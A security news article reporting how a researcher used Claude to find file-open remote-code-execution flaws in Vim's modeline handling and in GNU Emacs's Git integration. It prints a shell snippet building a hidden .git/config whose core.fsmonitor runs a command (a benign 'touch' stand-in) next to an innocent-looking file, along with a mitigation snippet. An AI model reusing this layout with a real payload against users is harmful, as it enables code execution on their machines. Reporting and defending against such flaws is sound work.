Claude AI finds Vim, Emacs RCE bugs that trigger on file open
Article URL: https://www.bleepingcomputer.com/news/security/claude-ai-finds-vim-emacs-rce-bugs-that-trigger-on-file-open/ | Hacker News discussion: https://news.ycombinator.com/item?id=47632805
Vulnerabilities in the Vim and GNU Emacs text editors, discovered using simple prompts to the Claude assistant, allow remote code execution merely by opening a file.
The assistant also created multiple versions of proof-of-concept (PoC) exploits, refined them, and provided suggestions to address the security issues.
Vim and GNU Emacs are programmable text editors primarily used by developers and sysadmins for code editing, terminal-based workflows, and scripting. Vim in particular is widely used in DevOps, and is installed by default on most Linux server distributions, embedded systems, and macOS.
Vim flaw and fix
Hung Nguyen, a researcher at the boutique cybersecurity firm Calif, which specializes in AI red teaming and security engineering, found the issues in Vim after instructing Claude to find a remote code execution (RCE) zero-day vulnerability in the text editor triggered by opening a file.
The Claude assistant analyzed Vim’s source code and identified missing security checks and issues in modeline handling, allowing code embedded in a file to be executed upon opening.
A modeline is text placed at the beginning of a file that instructs Vim how to handle it.
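For illustration, a modeline is just a specially formatted line near the top (or bottom) of a file that Vim parses for editor options. The file name and options below are hypothetical:

```shell
# Create a file whose first line is a Vim modeline (illustrative file
# name and options). When Vim opens example.c, it parses this line and
# applies the listed settings (tab width, shift width, filetype).
cat > example.c <<'EOF'
/* vim: set ts=4 sw=4 ft=c: */
int main(void) { return 0; }
EOF
head -n 1 example.c
# prints: /* vim: set ts=4 sw=4 ft=c: */
```

By default Vim only scans the first and last few lines of a file for modelines, which is why a crafted file triggers the parsing path as soon as it is opened.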
Even though modeline-triggered code is supposed to run in a sandbox, a second problem allowed it to escape that restriction and execute commands in the context of the current user.
The vulnerability has not been assigned a CVE ID and affects Vim versions 9.2.0271 and earlier.
Nguyen reported the issue to the Vim maintainers, who promptly released a patch in Vim version 9.2.0272. The Vim team noted that a victim would only need to open a specially crafted file to trigger the vulnerability.
“An attacker who can deliver a crafted file to a victim achieves arbitrary command execution with the privileges of the user running Vim,” reads the bulletin.
GNU Emacs points to Git
In the case of GNU Emacs, the vulnerability remains unpatched, as the developers consider it Git's responsibility to address.
The problem stems from GNU Emacs' version-control integration (vc-git): opening a file triggers Git operations via vc-refresh-state, causing Git to read the repository's .git/config file and run any user-defined core.fsmonitor program, an option that can be abused to execute arbitrary commands.
An attack scenario devised by the researcher involves delivering an archive (e.g., via email or a shared drive) that contains a hidden .git/ directory with a config file pointing to an executable script.
When the victim extracts the archive and opens the text file, the payload executes without any visible indicators on the GNU Emacs default configuration.
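A minimal sketch of the malicious directory layout described above; the directory name, file names, and payload command are all hypothetical:

```shell
# Build a directory that looks like a Git repository. The config sets
# core.fsmonitor, which Git treats as a command to run when tools such
# as Emacs' vc-git invoke Git inside this directory.
mkdir -p demo/.git
cat > demo/.git/config <<'EOF'
[core]
	repositoryformatversion = 0
	fsmonitor = "touch /tmp/pwned"
EOF
# An innocent-looking text file; opening it in Emacs triggers
# vc-refresh-state, which runs Git in this directory.
echo 'quarterly notes' > demo/notes.txt
```

Packed into an archive, this layout looks like an ordinary folder with a text file, since the .git/ directory is hidden by default.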
GNU Emacs maintainers consider this a problem in Git, not the text editor, because the environment is merely the trigger for the dangerous action executed by Git: reading the attacker-controlled config and executing a program from it.
While this argument is technically correct, since nothing is executed by GNU Emacs directly, the risk to the user remains: the editor automatically runs Git on untrusted directories without neutralizing dangerous options, requiring user consent, or applying sandbox protections.
Nguyen suggested that GNU Emacs could modify Git calls to explicitly block ‘core.fsmonitor,’ so any dangerous scripts/payloads wouldn’t be executed automatically when opening a file.
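That kind of override can be expressed on any Git invocation with the -c flag, which takes precedence over the repository's own config. A sketch using a throwaway repository (the repository name and simulated payload are hypothetical):

```shell
# Create a throwaway repository and simulate an attacker-controlled
# fsmonitor setting in its .git/config.
git init -q demo-repo
git -C demo-repo config core.fsmonitor "touch /tmp/pwned"

# Passing -c core.fsmonitor=false on the command line overrides the
# repository config, so the payload command is never executed.
git -C demo-repo -c core.fsmonitor=false status >/dev/null
```

An editor that wraps its Git calls this way would neutralize the dangerous option regardless of what the untrusted directory's config contains.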
As the flaw remains unpatched in the latest version of GNU Emacs, users are advised to exercise caution when opening files from unknown sources or downloaded from the internet.